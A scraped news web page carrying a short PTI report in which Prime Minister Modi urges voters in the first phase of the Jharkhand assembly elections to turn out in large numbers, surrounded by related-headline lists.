onclick="javascript:window.open(this.href, '_blank', 'menubar=no,toolbar=no,resizable=no,scrollbars=no,height=455,width=600');return false;"><span class="icon"><i class="fa-icon-pinterest"></i>Share</span></a>
                <span class="count"></span>
            </div> <!--icon-->
                            <div class="clear"></div>
        </div> <!--social share-->

<br>    
<figure class="wp-block-image"><img src="http://news.statetimes.in/wp-content/uploads/2019/08/PM-Modi-visits-Jaitleys-residence.jpg?x39047" alt="" class="wp-image-516617" srcset="http://news.statetimes.in/wp-content/uploads/2019/08/PM-Modi-visits-Jaitleys-residence.jpg 302w, http://news.statetimes.in/wp-content/uploads/2019/08/PM-Modi-visits-Jaitleys-residence-300x200.jpg 300w, http://news.statetimes.in/wp-content/uploads/2019/08/PM-Modi-visits-Jaitleys-residence-90x60.jpg 90w, http://news.statetimes.in/wp-content/uploads/2019/08/PM-Modi-visits-Jaitleys-residence-180x120.jpg 180w, http://news.statetimes.in/wp-content/uploads/2019/08/PM-Modi-visits-Jaitleys-residence-95x64.jpg 95w" sizes="(max-width: 302px) 100vw, 302px" /></figure>



<p>New Delhi: Prime Minister Narendra Modi on Saturday urged people of Jharkhand to turn out in large numbers and cast their vote in assembly polls to &#8220;enrich&#8221; democracy.</p>



<p>Polling is underway in the first of the five-phase assembly elections in Jharkhand.</p>



<p>A total of 37,83,055 voters will decide the fate of 189 candidates in 13 constituencies spread over six districts.</p>



<p>&#8220;Phase 1 of the Jharkhand elections is in progress. I urge those whose constituencies go to the polls today to vote in large numbers and enrich the festival of democracy,&#8221; Modi tweeted.</p>



<p>It is usual for the prime minister to take to social media on voting days to urge people to exercise their democratic right. (PTI)</p>
      

    
		<script type="text/javascript">
		jQuery(document).ready(function($) {
			$('.e3lanat-rotator-id-492 .mom-e3lanat-inner').imagesLoaded( function() {
			jQuery('.e3lanat-rotator-id-492 .mom-e3lanat-inner').boxSlider({
				autoScroll: false,
				timeout: 5000,
				speed: 800,
				effect: 'scrollVert3d',
				pauseOnHover: true,
				next:'.e3lanat-rotator-id-492 .adr-next',
				prev: '.e3lanat-rotator-id-492 .adr-prev'
				
			});

			});

		});
	</script>
		<div class="mom-e3lanat-wrap  ">
	<div class="mom-e3lanat e3lanat-layout-rotator e3lanat-rotator-id-492" style="width:320px; height:100px;">
		<div class="mom-e3lanat-inner">
		
				<div class="mom-e3lan" data-id="8540" style=" ">
		<div class="e3lan-code"><script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<!-- mobile one -->
<ins class="adsbygoogle"
     style="display:inline-block;width:320px;height:100px"
     data-ad-client="ca-pub-3121650879019050"
     data-ad-slot="6339736216"></ins>
<script>
(adsbygoogle = window.adsbygoogle || []).push({});
</script></div>	</div><!--mom ad-->
			</div>
	</div>	<!--Mom ads-->
	</div>
       <div class="mom-social-share ss-horizontal border-box php-share" data-id="554515">
                    <div class="ss-icon facebook">
                <a href="#" onclick="window.open('http://www.facebook.com/sharer/sharer.php?u=http://news.statetimes.in/pm-urges-people-to-vote-in-large-numbers-in-jharkhand/', 'Share This', 'menubar=no,toolbar=no,resizable=no,scrollbars=no, width=600,height=455');"><span class="icon"><i class="fa-icon-facebook"></i>Share</span></a>
                <span class="count">0</span>
            </div> <!--icon-->
        
                    <div class="ss-icon twitter">
                <a href="http://twitter.com/share?text=PM urges people to vote in large numbers in Jharkhand&url=http://news.statetimes.in/pm-urges-people-to-vote-in-large-numbers-in-jharkhand/" onclick="window.open(this.href, 'Post this on twitter', 'menubar=no,toolbar=no,resizable=no,scrollbars=no,width=600,height=455');"><span class="icon"><i class="fa-icon-twitter"></i>Tweet</span></a>
            </div> <!--icon-->
        
                    <div class="ss-icon googleplus">
                <a href="#"
onclick="window.open('https://plus.google.com/share?url=http://news.statetimes.in/pm-urges-people-to-vote-in-large-numbers-in-jharkhand/', '', 'menubar=no,toolbar=no,resizable=no,scrollbars=no,height=455,width=600');return false"><span class="icon"><i class="fa-icon-google-plus"></i>Share</span></a>
            </div> <!--icon-->
                                    <div class="ss-icon linkedin">
                <a href="#"
onclick="javascript:window.open('http://www.linkedin.com/shareArticle?mini=true&url=http://news.statetimes.in/pm-urges-people-to-vote-in-large-numbers-in-jharkhand/&title=PM urges people to vote in large numbers in Jharkhand&source=http%3A%2F%2Fnews.statetimes.in', '', 'menubar=no,toolbar=no,resizable=no,scrollbars=no,height=455,width=600');return false;"><span class="icon"><i class="fa-icon-linkedin"></i>Share</span></a>
                <span class="count"></span>
            </div> <!--icon-->
                            <div class="ss-icon pinterest">
                <a href="http://pinterest.com/pin/create/bookmarklet/?media=http://news.statetimes.in/wp-content/uploads/2019/08/PM-Modi-visits-Jaitleys-residence.jpg&amp;
url=http://news.statetimes.in/pm-urges-people-to-vote-in-large-numbers-in-jharkhand/&amp;
is_video=false&amp;description=PM urges people to vote in large numbers in Jharkhand"
onclick="javascript:window.open(this.href, '_blank', 'menubar=no,toolbar=no,resizable=no,scrollbars=no,height=455,width=600');return false;"><span class="icon"><i class="fa-icon-pinterest"></i>Share</span></a>
                <span class="count"></span>
            </div> <!--icon-->
                            <div class="clear"></div>
        </div> <!--social share-->

</div> <!-- entry content -->
</div> <!-- base box -->

            <div class="np-posts">
                <ul>
			                    <li class="np-post prev border-box">
						<div class="post-img">
                            <a href="http://news.statetimes.in/cricket-association-for-blind-jammu-kashmir-will-organised-inter-state-cricket-series-for-the-blind-on-2nd-3rd-december-2019-at-university-of-jammu/"><img src="http://news.statetimes.in/wp-content/uploads/2019/11/blind-90x60.jpg?x39047" data-hidpi="http://news.statetimes.in/wp-content/uploads/2019/11/blind-180x120.jpg" alt="PM urges people to vote in large numbers in Jharkhand"></a>
                        </div>
			                        <div class="details has-feature-image">
                            <a href="http://news.statetimes.in/cricket-association-for-blind-jammu-kashmir-will-organised-inter-state-cricket-series-for-the-blind-on-2nd-3rd-december-2019-at-university-of-jammu/" class="link prev"><i class="fa-icon-double-angle-left"></i>Previous</a>
                            <h3><a href="http://news.statetimes.in/cricket-association-for-blind-jammu-kashmir-will-organised-inter-state-cricket-series-for-the-blind-on-2nd-3rd-december-2019-at-university-of-jammu/">Cricket Association for Blind Jammu &#038; Kashmir will organised Inter State Cricket Series for the Blind on 2nd &#038;  3rd December 2019 at University of Jammu</a></h3>
                        </div>
                    </li>
		    		                    </ul>
            </div> <!-- np posts -->
		<div class="mom-e3lanat-wrap responsive ">
	<div class="mom-e3lanat " style="">
		<div class="mom-e3lanat-inner">
		
				<div class="mom-e3lan" data-id="322174" style="width:px; height:autopx;  ">
		<div class="e3lan-code"><script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<ins class="adsbygoogle"
     style="display:block"
     data-ad-format="autorelaxed"
     data-ad-client="ca-pub-3121650879019050"
     data-ad-slot="4609961952"></ins>
<script>
     (adsbygoogle = window.adsbygoogle || []).push({});
</script></div>	</div><!--mom ad-->
			</div>
	</div>	<!--Mom ads-->
	</div>
                <h2 class="single-title">Related Articles</h2>
            <div class="base-box single-box">
                <ul class="single-related-posts">
	   	     	       <li>
			                        <a href="http://news.statetimes.in/teenage-girl-sits-on-solitary-protest-outside-parliament-over-crimes-against-women/"><img src="http://news.statetimes.in/wp-content/uploads/2017/11/Parliaments-Winter-Session-to-be-held-from-Dec-15-to-Jan-5.jpg?x39047" data-hidpi="http://news.statetimes.in/wp-content/uploads/2017/11/Parliaments-Winter-Session-to-be-held-from-Dec-15-to-Jan-5.jpg" alt="Teenage girl sits on solitary protest outside Parliament over crimes against women"></a>
			                        <h4><a itemprop="name" href="http://news.statetimes.in/teenage-girl-sits-on-solitary-protest-outside-parliament-over-crimes-against-women/">Teenage girl sits on solitary protest outside Parliament over crimes against women</a></h4>
                        <div class="mom-post-meta">
			<time datetime="2019-11-30T11:07:43+00:00">November 30, 2019</time>
			</div>
                </li>

	       <li>
			                        <a href="http://news.statetimes.in/tens-of-thousands-rally-in-europe-asia-before-un-climate-summit/"><img src="http://news.statetimes.in/wp-content/uploads/2019/11/Tens-of-thousands-rally-in-Europe-Asia-before-UN-climate-summit.jpg?x39047" data-hidpi="http://news.statetimes.in/wp-content/uploads/2019/11/Tens-of-thousands-rally-in-Europe-Asia-before-UN-climate-summit.jpg" alt="Tens of thousands rally in Europe, Asia before UN climate summit"></a>
			                        <h4><a itemprop="name" href="http://news.statetimes.in/tens-of-thousands-rally-in-europe-asia-before-un-climate-summit/">Tens of thousands rally in Europe, Asia before UN climate summit</a></h4>
                        <div class="mom-post-meta">
			<time datetime="2019-11-30T10:49:23+00:00">November 30, 2019</time>
			</div>
                </li>

	       <li>
			                        <a href="http://news.statetimes.in/pak-waging-proxy-war-as-it-cant-win-conventional-one-rajnath/"><img src="http://news.statetimes.in/wp-content/uploads/2018/12/rajnath-singh-1.jpg?x39047" data-hidpi="http://news.statetimes.in/wp-content/uploads/2018/12/rajnath-singh-1.jpg" alt="Pak waging proxy war as it can't win conventional one: Rajnath"></a>
			                        <h4><a itemprop="name" href="http://news.statetimes.in/pak-waging-proxy-war-as-it-cant-win-conventional-one-rajnath/">Pak waging proxy war as it can&#8217;t win conventional one: Rajnath</a></h4>
                        <div class="mom-post-meta">
			<time datetime="2019-11-30T10:47:56+00:00">November 30, 2019</time>
			</div>
                </li>

	       <li>
			                        <a href="http://news.statetimes.in/uddhav-thackeray-led-govt-to-face-floor-test-on-saturday/"><img src="http://news.statetimes.in/wp-content/uploads/2015/07/Uddhav-Thackeray1.jpg?x39047" data-hidpi="http://news.statetimes.in/wp-content/uploads/2015/07/Uddhav-Thackeray1.jpg" alt="Uddhav Thackeray-led govt to face floor test on Saturday"></a>
			                        <h4><a itemprop="name" href="http://news.statetimes.in/uddhav-thackeray-led-govt-to-face-floor-test-on-saturday/">Uddhav Thackeray-led govt to face floor test on Saturday</a></h4>
                        <div class="mom-post-meta">
			<time datetime="2019-11-30T10:45:52+00:00">November 30, 2019</time>
			</div>
                </li>

	       <li>
			                        <a href="http://news.statetimes.in/woman-vet-raped-before-being-killed-4-lorry-workers-arrested/"><img src="http://news.statetimes.in/wp-content/uploads/2016/12/ST-LOGO-190x122.jpg?x39047" data-hidpi="http://news.statetimes.in/wp-content/uploads/2016/12/ST-LOGO.jpg" alt="Woman vet raped before being killed: 4 lorry workers arrested"></a>
			                        <h4><a itemprop="name" href="http://news.statetimes.in/woman-vet-raped-before-being-killed-4-lorry-workers-arrested/">Woman vet raped before being killed: 4 lorry workers arrested</a></h4>
                        <div class="mom-post-meta">
			<time datetime="2019-11-30T01:10:08+00:00">November 30, 2019</time>
			</div>
                </li>

	       <li>
			                        <a href="http://news.statetimes.in/tourism-policy-for-jk-need-of-hour-priya/"><img src="http://news.statetimes.in/wp-content/uploads/2019/11/J-K-needs-a-tourism-policy-Priya-Sethi.jpg?x39047" data-hidpi="http://news.statetimes.in/wp-content/uploads/2019/11/J-K-needs-a-tourism-policy-Priya-Sethi.jpg" alt="Tourism policy for J&K need of hour: Priya"></a>
			                        <h4><a itemprop="name" href="http://news.statetimes.in/tourism-policy-for-jk-need-of-hour-priya/">Tourism policy for J&#038;K need of hour: Priya</a></h4>
                        <div class="mom-post-meta">
			<time datetime="2019-11-30T00:47:57+00:00">November 30, 2019</time>
			</div>
                </li>

</ul>
</div>

<div id="comments" class="comments-area">

	
		
		<div id="respond" class="comment-respond">
		<h3 id="reply-title" class="comment-reply-title">Leave a Reply <small><a rel="nofollow" id="cancel-comment-reply-link" href="/pm-urges-people-to-vote-in-large-numbers-in-jharkhand/#respond" style="display:none;">Cancel Reply</a></small></h3>			<form action="http://news.statetimes.in/wp-comments-post.php" method="post" id="commentform" class="comment-form">
				<p class="comment-notes"><span id="email-notes">Your email address will not be published.</span> Required fields are marked <span class="required">*</span></p><p class="comment-form-comment"><textarea id="comment" placeholder="Comment..." name="comment" cols="45" rows="8" aria-required="true"></textarea></p><input id="author" name="author" type="text" placeholder="Name (required)" value="" size="30" aria-required='true' />
<input id="email" name="email" type="text" placeholder="Email (required)" value="" size="30" aria-required='true' />
<input id="url" name="url" type="text" placeholder="Website" value="" size="30" />
<p class="form-submit"><input name="submit" type="submit" id="submit-comment" class="submit" value="Post Comment" /> <input type='hidden' name='comment_post_ID' value='554515' id='comment_post_ID' />
<input type='hidden' name='comment_parent' id='comment_parent' value='0' />
</p><p style="display: none;"><input type="hidden" id="akismet_comment_nonce" name="akismet_comment_nonce" value="a20174627e" /></p><p style="display: none;"><input type="hidden" id="ak_js" name="ak_js" value="189"/></p>			</form>
			</div><!-- #respond -->
	
</div><!-- #comments .comments-area -->
            </div> <!--main column-->
                      <div class="sidebar secondary-sidebar" role="complementary" itemscope="itemscope" itemtype="http://schema.org/WPSideBar">
            <div class="widget momizat-posts_list"><div class="widget-head"><h3 class="widget-title"><span>Latest News</span></h3></div>		<ul>
		
			<li><a href="http://news.statetimes.in/pm-urges-people-to-vote-in-large-numbers-in-jharkhand/">PM urges people to vote in large numbers in Jharkhand</a></li>

			
			<li><a href="http://news.statetimes.in/teenage-girl-sits-on-solitary-protest-outside-parliament-over-crimes-against-women/">Teenage girl sits on solitary protest outside Parliament over crimes against women</a></li>

			
			<li><a href="http://news.statetimes.in/tens-of-thousands-rally-in-europe-asia-before-un-climate-summit/">Tens of thousands rally in Europe, Asia before UN climate summit</a></li>

			
			<li><a href="http://news.statetimes.in/pak-waging-proxy-war-as-it-cant-win-conventional-one-rajnath/">Pak waging proxy war as it can&#8217;t win conventional one: Rajnath</a></li>

			
			<li><a href="http://news.statetimes.in/uddhav-thackeray-led-govt-to-face-floor-test-on-saturday/">Uddhav Thackeray-led govt to face floor test on Saturday</a></li>

			
			<li><a href="http://news.statetimes.in/winter-vacation-for-government-private-schools-of-the-union-territory-of-ladakh/">Winter Vacation for Government/Private Schools of the Union Territory of Ladakh</a></li>

			
			<li><a href="http://news.statetimes.in/utilizing-of-services-of-officers-officials-of-the-erstwhile-jammu-and-kashmir-legislative-council-secretariat-in-different-departments-organisations/">Utilizing of services of officers/officials of the erstwhile Jammu and Kashmir Legislative Council Secretariat in different Departments / Organisations</a></li>

			
			<li><a href="http://news.statetimes.in/selection-list-of-candidates-for-the-post-of-sub-inspector-finance-department-divisional-cadre-jammu/">Selection list of candidates for the post of Sub Inspector, Finance Department (Divisional Cadre Jammu)</a></li>

			
			<li><a href="http://news.statetimes.in/pragya-thakur-tenders-apology-in-ls-for-remarks-on-godse/">Pragya Thakur tenders apology in LS for remarks on Godse</a></li>

			
			<li><a href="http://news.statetimes.in/srinagar-jammu-metro-project-to-start-operations-by-sept-2024/">Srinagar-Jammu metro project to start operations by Sept 2024</a></li>

			
			<li><a href="http://news.statetimes.in/two-former-jk-mlas-detained-since-aug-5-admitted-to-hospital-officials/">Two former JK MLAs, detained since Aug 5, admitted to hospital: Officials</a></li>

			
			<li><a href="http://news.statetimes.in/schedule-of-hearing-of-public-grievances-by-the-advisors/">Schedule of hearing of Public Grievances by the Advisors</a></li>

			
			<li><a href="http://news.statetimes.in/speaker-indicates-pragya-thakur-to-be-called-to-ls/">Speaker indicates Pragya Thakur to be called to LS</a></li>

			
			<li><a href="http://news.statetimes.in/eam-meets-sri-lankan-prez-gotabaya-rajapaksa/">EAM meets Sri Lankan Prez Gotabaya Rajapaksa</a></li>

			
			<li><a href="http://news.statetimes.in/iit-researchers-to-create-gandhipedia/">IIT researchers to create &#8216;Gandhipedia&#8217;</a></li>

											</ul>
</div>
            </div> <!--main sidebar-->
            <div class="clear"></div>
            <div class="clear"></div>
</div> <!--main container-->            
            <div class="sidebar main-sidebar" role="complementary" itemscope="itemscope" itemtype="http://schema.org/WPSideBar">
            <div class="widget momizat-ads">		<div class="mom-e3lanat-wrap responsive ">
	<div class="mom-e3lanat " style="">
		<div class="mom-e3lanat-inner">
		
				<div class="mom-e3lan" data-id="4677" style="width:px; height:autopx;  ">
		<div class="e3lan-code"><script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<!-- sidebar one -->
<ins class="adsbygoogle"
     style="display:inline-block;width:300px;height:250px"
     data-ad-client="ca-pub-3121650879019050"
     data-ad-slot="5446915816"></ins>
<script>
(adsbygoogle = window.adsbygoogle || []).push({});
</script></div>	</div><!--mom ad-->
			</div>
	</div>	<!--Mom ads-->
	</div>
</div><div class="widget widget_momizattabber">                        <div class="main_tabs">
                            <ul class="tabs"></ul>
                            <div class="tabs-content-wrap">
                                <div class="tab-content"><a href="#" class="mom-tw-title">Top Stories</a>                                   <div class="mom-posts-widget">

					<div class="mpw-post">
							    <div class="post-img main-sidebar-element"><a href="http://news.statetimes.in/sagar-among-2-detained-nc-leaders-admitted-to-hospital/"><img src="http://news.statetimes.in/wp-content/uploads/2016/12/ST-LOGO-90x60.jpg?x39047" data-hidpi="http://news.statetimes.in/wp-content/uploads/2016/12/ST-LOGO-90x60.jpg" alt="Sagar among 2 detained NC leaders admitted to hospital" width="90" height="60"></a></div>
			    <div class="post-img sec-sidebar-element"><a href="http://news.statetimes.in/sagar-among-2-detained-nc-leaders-admitted-to-hospital/"><img src="http://news.statetimes.in/wp-content/uploads/2016/12/ST-LOGO-180x120.jpg?x39047" data-hidpi="http://news.statetimes.in/wp-content/uploads/2016/12/ST-LOGO-180x120.jpg" alt="Sagar among 2 detained NC leaders admitted to hospital" width="180" height="120"></a><span class="post-format-icon"></span></div>
			    			   <div class="details has-feature-image">
			    <h4><a href="http://news.statetimes.in/sagar-among-2-detained-nc-leaders-admitted-to-hospital/">Sagar among 2 detained NC leaders admitted to hospital</a></h4>
			   <div class="mom-post-meta mom-w-meta">
				<span datetime="2019-11-30T00:42:43+00:00" class="entry-date">November 30, 2019</span>
			    			    </div>
			</div>
			</div> <!--//post-->

						<div class="mpw-post">
							    <div class="post-img main-sidebar-element"><a href="http://news.statetimes.in/working-on-implementation-of-73rd-74th-amendments-of-pr-act-lg/"><img src="http://news.statetimes.in/wp-content/uploads/2019/11/Lt.-Governor-during-Back-to-Village-2-programme-at-Sonpah-Beerwah-in-Budgam-district.jpg?x39047" data-hidpi="http://news.statetimes.in/wp-content/uploads/2019/11/Lt.-Governor-during-Back-to-Village-2-programme-at-Sonpah-Beerwah-in-Budgam-district.jpg" alt="Working on implementation of 73rd, 74th amendments of PR Act: LG" width="90" height="60"></a></div>
			    <div class="post-img sec-sidebar-element"><a href="http://news.statetimes.in/working-on-implementation-of-73rd-74th-amendments-of-pr-act-lg/"><img src="http://news.statetimes.in/wp-content/uploads/2019/11/Lt.-Governor-during-Back-to-Village-2-programme-at-Sonpah-Beerwah-in-Budgam-district.jpg?x39047" data-hidpi="http://news.statetimes.in/wp-content/uploads/2019/11/Lt.-Governor-during-Back-to-Village-2-programme-at-Sonpah-Beerwah-in-Budgam-district.jpg" alt="Working on implementation of 73rd, 74th amendments of PR Act: LG" width="180" height="120"></a><span class="post-format-icon"></span></div>
			    			   <div class="details has-feature-image">
			    <h4><a href="http://news.statetimes.in/working-on-implementation-of-73rd-74th-amendments-of-pr-act-lg/">Working on implementation of 73rd, 74th amendments of PR Act: LG</a></h4>
			   <div class="mom-post-meta mom-w-meta">
				<span datetime="2019-11-30T00:42:40+00:00" class="entry-date">November 30, 2019</span>
			    			    </div>
			</div>
			</div> <!--//post-->

						<div class="mpw-post">
							    <div class="post-img main-sidebar-element"><a href="http://news.statetimes.in/rs-30-lakh-ex-gratia-announced-for-noks-of-sheikh-zahoor/"><img src="http://news.statetimes.in/wp-content/uploads/2016/12/ST-LOGO-90x60.jpg?x39047" data-hidpi="http://news.statetimes.in/wp-content/uploads/2016/12/ST-LOGO-90x60.jpg" alt="Rs 30 lakh ex-gratia announced for NoKs of Sheikh Zahoor" width="90" height="60"></a></div>
			    <div class="post-img sec-sidebar-element"><a href="http://news.statetimes.in/rs-30-lakh-ex-gratia-announced-for-noks-of-sheikh-zahoor/"><img src="http://news.statetimes.in/wp-content/uploads/2016/12/ST-LOGO-180x120.jpg?x39047" data-hidpi="http://news.statetimes.in/wp-content/uploads/2016/12/ST-LOGO-180x120.jpg" alt="Rs 30 lakh ex-gratia announced for NoKs of Sheikh Zahoor" width="180" height="120"></a><span class="post-format-icon"></span></div>
			    			   <div class="details has-feature-image">
			    <h4><a href="http://news.statetimes.in/rs-30-lakh-ex-gratia-announced-for-noks-of-sheikh-zahoor/">Rs 30 lakh ex-gratia announced for NoKs of Sheikh Zahoor</a></h4>
			   <div class="mom-post-meta mom-w-meta">
				<span datetime="2019-11-30T00:42:34+00:00" class="entry-date">November 30, 2019</span>
			    			    </div>
			</div>
			</div> <!--//post-->

						<div class="mpw-post">
							    <div class="post-img main-sidebar-element"><a href="http://news.statetimes.in/28-ogws-arrested-1-terrorist-surrendered-in-one-month-in-kashmir-police/"><img src="http://news.statetimes.in/wp-content/uploads/2016/12/ST-LOGO-90x60.jpg?x39047" data-hidpi="http://news.statetimes.in/wp-content/uploads/2016/12/ST-LOGO-90x60.jpg" alt="28 OGWs arrested, 1 terrorist surrendered in one month in Kashmir: Police" width="90" height="60"></a></div>
			    <div class="post-img sec-sidebar-element"><a href="http://news.statetimes.in/28-ogws-arrested-1-terrorist-surrendered-in-one-month-in-kashmir-police/"><img src="http://news.statetimes.in/wp-content/uploads/2016/12/ST-LOGO-180x120.jpg?x39047" data-hidpi="http://news.statetimes.in/wp-content/uploads/2016/12/ST-LOGO-180x120.jpg" alt="28 OGWs arrested, 1 terrorist surrendered in one month in Kashmir: Police" width="180" height="120"></a><span class="post-format-icon"></span></div>
			    			   <div class="details has-feature-image">
			    <h4><a href="http://news.statetimes.in/28-ogws-arrested-1-terrorist-surrendered-in-one-month-in-kashmir-police/">28 OGWs arrested, 1 terrorist surrendered in one month in Kashmir: Police</a></h4>
			   <div class="mom-post-meta mom-w-meta">
				<span datetime="2019-11-30T00:42:29+00:00" class="entry-date">November 30, 2019</span>
			    			    </div>
			</div>
			</div> <!--//post-->

						<div class="mpw-post">
							    <div class="post-img main-sidebar-element"><a href="http://news.statetimes.in/4-5-per-cent-gdp-growth-rate-unacceptable-worrisome-manmohan/"><img src="http://news.statetimes.in/wp-content/uploads/2019/11/Manmohan.jpg?x39047" data-hidpi="http://news.statetimes.in/wp-content/uploads/2019/11/Manmohan.jpg" alt="4.5 per cent GDP growth rate  unacceptable, worrisome: Manmohan" width="90" height="60"></a></div>
			    <div class="post-img sec-sidebar-element"><a href="http://news.statetimes.in/4-5-per-cent-gdp-growth-rate-unacceptable-worrisome-manmohan/"><img src="http://news.statetimes.in/wp-content/uploads/2019/11/Manmohan.jpg?x39047" data-hidpi="http://news.statetimes.in/wp-content/uploads/2019/11/Manmohan.jpg" alt="4.5 per cent GDP growth rate  unacceptable, worrisome: Manmohan" width="180" height="120"></a><span class="post-format-icon"></span></div>
			    			   <div class="details has-feature-image">
			    <h4><a href="http://news.statetimes.in/4-5-per-cent-gdp-growth-rate-unacceptable-worrisome-manmohan/">4.5 per cent GDP growth rate  unacceptable, worrisome: Manmohan</a></h4>
			   <div class="mom-post-meta mom-w-meta">
				<span datetime="2019-11-30T00:42:26+00:00" class="entry-date">November 30, 2019</span>
			    			    </div>
			</div>
			</div> <!--//post-->

						<div class="mpw-post">
							    <div class="post-img main-sidebar-element"><a href="http://news.statetimes.in/uddhav-led-govt-to-face-floor-test-today/"><img src="http://news.statetimes.in/wp-content/uploads/2016/12/ST-LOGO-90x60.jpg?x39047" data-hidpi="http://news.statetimes.in/wp-content/uploads/2016/12/ST-LOGO-90x60.jpg" alt="Uddhav led Govt to face floor test today" width="90" height="60"></a></div>
			    <div class="post-img sec-sidebar-element"><a href="http://news.statetimes.in/uddhav-led-govt-to-face-floor-test-today/"><img src="http://news.statetimes.in/wp-content/uploads/2016/12/ST-LOGO-180x120.jpg?x39047" data-hidpi="http://news.statetimes.in/wp-content/uploads/2016/12/ST-LOGO-180x120.jpg" alt="Uddhav led Govt to face floor test today" width="180" height="120"></a><span class="post-format-icon"></span></div>
			    			   <div class="details has-feature-image">
			    <h4><a href="http://news.statetimes.in/uddhav-led-govt-to-face-floor-test-today/">Uddhav led Govt to face floor test today</a></h4>
			   <div class="mom-post-meta mom-w-meta">
				<span datetime="2019-11-30T00:42:22+00:00" class="entry-date">November 30, 2019</span>
			    			    </div>
			</div>
			</div> <!--//post-->

						<div class="mpw-post">
							    <div class="post-img main-sidebar-element"><a href="http://news.statetimes.in/bribe-giver-made-equally-liable-for-punishment-dr-jitendra/"><img src="http://news.statetimes.in/wp-content/uploads/2019/11/Jitttttttttt-1.jpg?x39047" data-hidpi="http://news.statetimes.in/wp-content/uploads/2019/11/Jitttttttttt-1.jpg" alt="Bribe-giver made equally liable for punishment: Dr Jitendra" width="90" height="60"></a></div>
			    <div class="post-img sec-sidebar-element"><a href="http://news.statetimes.in/bribe-giver-made-equally-liable-for-punishment-dr-jitendra/"><img src="http://news.statetimes.in/wp-content/uploads/2019/11/Jitttttttttt-1.jpg?x39047" data-hidpi="http://news.statetimes.in/wp-content/uploads/2019/11/Jitttttttttt-1.jpg" alt="Bribe-giver made equally liable for punishment: Dr Jitendra" width="180" height="120"></a><span class="post-format-icon"></span></div>
			    			   <div class="details has-feature-image">
			    <h4><a href="http://news.statetimes.in/bribe-giver-made-equally-liable-for-punishment-dr-jitendra/">Bribe-giver made equally liable for punishment: Dr Jitendra</a></h4>
			   <div class="mom-post-meta mom-w-meta">
				<span datetime="2019-11-30T00:42:20+00:00" class="entry-date">November 30, 2019</span>
			    			    </div>
			</div>
			</div> <!--//post-->

						<div class="mpw-post">
							    <div class="post-img main-sidebar-element"><a href="http://news.statetimes.in/govt-extends-mandatory-fastag-roll-out-date-to-dec-15-free-fastags-till-dec-15/"><img src="http://news.statetimes.in/wp-content/uploads/2016/12/ST-LOGO-90x60.jpg?x39047" data-hidpi="http://news.statetimes.in/wp-content/uploads/2016/12/ST-LOGO-90x60.jpg" alt="Govt extends mandatory FASTag roll-out date to Dec 15; free FASTags till Dec 15" width="90" height="60"></a></div>
			    <div class="post-img sec-sidebar-element"><a href="http://news.statetimes.in/govt-extends-mandatory-fastag-roll-out-date-to-dec-15-free-fastags-till-dec-15/"><img src="http://news.statetimes.in/wp-content/uploads/2016/12/ST-LOGO-180x120.jpg?x39047" data-hidpi="http://news.statetimes.in/wp-content/uploads/2016/12/ST-LOGO-180x120.jpg" alt="Govt extends mandatory FASTag roll-out date to Dec 15; free FASTags till Dec 15" width="180" height="120"></a><span class="post-format-icon"></span></div>
			    			   <div class="details has-feature-image">
			    <h4><a href="http://news.statetimes.in/govt-extends-mandatory-fastag-roll-out-date-to-dec-15-free-fastags-till-dec-15/">Govt extends mandatory FASTag roll-out date to Dec 15; free FASTags till Dec 15</a></h4>
			   <div class="mom-post-meta mom-w-meta">
				<span datetime="2019-11-30T00:42:16+00:00" class="entry-date">November 30, 2019</span>
			    			    </div>
			</div>
			</div> <!--//post-->

						<div class="mpw-post">
							    <div class="post-img main-sidebar-element"><a href="http://news.statetimes.in/rajni-dhingra-is-new-registrar-ju/"><img src="http://news.statetimes.in/wp-content/uploads/2016/12/ST-LOGO-90x60.jpg?x39047" data-hidpi="http://news.statetimes.in/wp-content/uploads/2016/12/ST-LOGO-90x60.jpg" alt="Rajni Dhingra is new Registrar JU" width="90" height="60"></a></div>
			    <div class="post-img sec-sidebar-element"><a href="http://news.statetimes.in/rajni-dhingra-is-new-registrar-ju/"><img src="http://news.statetimes.in/wp-content/uploads/2016/12/ST-LOGO-180x120.jpg?x39047" data-hidpi="http://news.statetimes.in/wp-content/uploads/2016/12/ST-LOGO-180x120.jpg" alt="Rajni Dhingra is new Registrar JU" width="180" height="120"></a><span class="post-format-icon"></span></div>
			    			   <div class="details has-feature-image">
			    <h4><a href="http://news.statetimes.in/rajni-dhingra-is-new-registrar-ju/">Rajni Dhingra is new Registrar JU</a></h4>
			   <div class="mom-post-meta mom-w-meta">
				<span datetime="2019-11-30T00:42:15+00:00" class="entry-date">November 30, 2019</span>
			    			    </div>
			</div>
			</div> <!--//post-->

						<div class="mpw-post">
							    <div class="post-img main-sidebar-element"><a href="http://news.statetimes.in/winter-vacations-from-dec-2/"><img src="http://news.statetimes.in/wp-content/uploads/2016/12/ST-LOGO-90x60.jpg?x39047" data-hidpi="http://news.statetimes.in/wp-content/uploads/2016/12/ST-LOGO-90x60.jpg" alt="Winter vacations from Dec 2" width="90" height="60"></a></div>
			    <div class="post-img sec-sidebar-element"><a href="http://news.statetimes.in/winter-vacations-from-dec-2/"><img src="http://news.statetimes.in/wp-content/uploads/2016/12/ST-LOGO-180x120.jpg?x39047" data-hidpi="http://news.statetimes.in/wp-content/uploads/2016/12/ST-LOGO-180x120.jpg" alt="Winter vacations from Dec 2" width="180" height="120"></a><span class="post-format-icon"></span></div>
			    			   <div class="details has-feature-image">
			    <h4><a href="http://news.statetimes.in/winter-vacations-from-dec-2/">Winter vacations from Dec 2</a></h4>
			   <div class="mom-post-meta mom-w-meta">
				<span datetime="2019-11-30T00:40:12+00:00" class="entry-date">November 30, 2019</span>
			    			    </div>
			</div>
			</div> <!--//post-->

						<div class="mpw-post">
							    <div class="post-img main-sidebar-element"><a href="http://news.statetimes.in/notices-served-to-eight-si-appointees-of-st-deptt/"><img src="http://news.statetimes.in/wp-content/uploads/2016/12/ST-LOGO-90x60.jpg?x39047" data-hidpi="http://news.statetimes.in/wp-content/uploads/2016/12/ST-LOGO-90x60.jpg" alt="Notices served to eight SI appointees of ST Deptt" width="90" height="60"></a></div>
